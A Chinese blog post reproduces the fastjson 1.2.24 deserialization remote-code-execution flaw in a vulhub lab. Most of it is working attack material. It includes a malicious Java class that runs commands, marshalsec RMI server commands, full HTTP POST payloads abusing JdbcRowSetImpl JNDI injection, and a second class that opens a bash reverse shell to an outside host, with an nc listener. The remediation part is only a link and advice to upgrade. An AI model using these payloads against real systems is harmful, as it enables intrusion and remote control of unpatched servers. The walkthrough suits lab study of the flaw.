标签：docker   visit   mozilla   static   control   利用   rmi   持久化   loading   

简介

漏洞环境：不另作说明均为vulhub

菜鸟链接：https://www.runoob.com/w3cnote/fastjson-intro.html

GitHub：https://github.com/alibaba/fastjson

fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串，这样得到字符串之后就可以通过数据库等方式进行持久化了。

关于漏洞原理，这篇文章讲的挺好的：https://zhuanlan.zhihu.com/p/157211675?from_voters_page=true，复现时参考的文章也很不错。

1.2.24-rce

参考链接：

https://blog.csdn.net/qq_44159028/article/details/112393935

https://github.com/vulhub/vulhub/blob/master/fastjson/1.2.24-rce/README.md

https://blog.csdn.net/w1590191166/article/details/105016535

https://www.freebuf.com/articles/web/258253.html

影响版本：

• fastjson

fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。在Java 8u102环境下，没有com.sun.jndi.rmi.object.trustURLCodebase的限制，可以使用com.sun.rowset.JdbcRowSetImpl的利用链，借助JNDI注入来执行命令。

漏洞复现

使用vulhub开启环境，成功后会开启8090端口，访问后结果如下说明搭建成功。

在Linux系统下通过如下命令，发送一个JSON对象，更新服务端的信息。

curl http://139.198.172.202:8090/ -H "Content-Type: application/json" --data ‘{"name":"xzc", "age":23}‘

不要使用Windows系统下自带的curl命令，因为会报错，我记得之前也遇到过。

将下面代码内容（恶意类）保存为TouchFile.java文件（名字不能乱改）。

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译生成.class文件。

javac TouchFile.java

将生成的.class文件放置到云主机中，使用python3 -m http.server 9999命令，启动一个http服务。

然后需要借助marshalsec项目，启动一个RMI服务器，用来指定加载远程类。

项目地址：https://github.com/mbechler/marshalsec

最终我们要是用的是其生成的marshalsec-0.0.3-SNAPSHOT-all.jar，自己生成略微麻烦，网上有现成的：https://github.com/zhzyker/exphub/blob/master/fastjson/marshalsec-0.0.3-SNAPSHOT-all.jar

接下来使用marshalsec-0.0.3-SNAPSHOT-all.jar来起一个RMI服务，监听6666端口。

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://139.198.172.202:9999/#TouchFile" 6666

访问靶机地址，拦截抓包，将GET请求改为POST请求，提交攻击payload。

POST / HTTP/1.1
Host: 139.198.172.202:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ECS[visit_times]=4; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=oGblD1Xgl1ZFrVI58W88SA%3D%3D; pmaUser-1=XlLtmUCDz5gzl%2FNz%2Fe7h1w%3D%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 165

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://139.198.172.202:6666/TouchFile",
        "autoCommit":true
    }
}

点击发送，服务器响应如下：

通过docker ps命令查看启动的容器id，通过docker exec -it 容器id /bin/bash进入容器。到/tmp目录下查看success文件是否被创建。

http服务以及RMI服务的请求内容如下：

其中，如果你的云主机的java版本较高，启动的RMI服务会有warning情况（可能会导致实验不成功），我的云主机java版本为jdk1.8.0_291。

反弹shell：

1. 生成恶意类

// javac shell.java
import java.lang.Runtime;
import java.lang.Process;

public class shell {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/139.198.172.202/7777 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

通过javac命令进行编译，生成shell.class。

2. 将生成的shell.class文件放置在http服务目录下，端口9999。

3. 启用RMI服务。

   java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://139.198.172.202:9999/#shell" 6666
   

   #后面内容需要修改。

4. 云主机监听7777端口，nc -lvp 7777。

5. 发送请求包内容：

   POST / HTTP/1.1
   Host: 139.198.172.202:8090
   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate
   Connection: close
   Cookie: ECS[visit_times]=4; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=oGblD1Xgl1ZFrVI58W88SA%3D%3D; pmaUser-1=XlLtmUCDz5gzl%2FNz%2Fe7h1w%3D%3D
   Upgrade-Insecure-Requests: 1
   Cache-Control: max-age=0
   Content-Type: application/json
   Content-Length: 163
   
   {
       "b":{
           "@type":"com.sun.rowset.JdbcRowSetImpl",
           "dataSourceName":"rmi://139.198.172.202:6666/shell",
           "autoCommit":true
       }
   } 	
   

6. 云主机接收到反弹的shell：

   

漏洞修复

参考链接：

https://www.freebuf.com/vuls/178012.html

还有就是升级版本咯。

1.2.47-rce

vuln

fastjson漏洞复现

标签：docker   visit   mozilla   static   control   利用   rmi   持久化   loading   

原文地址：https://www.cnblogs.com/ahtoh/p/14991631.html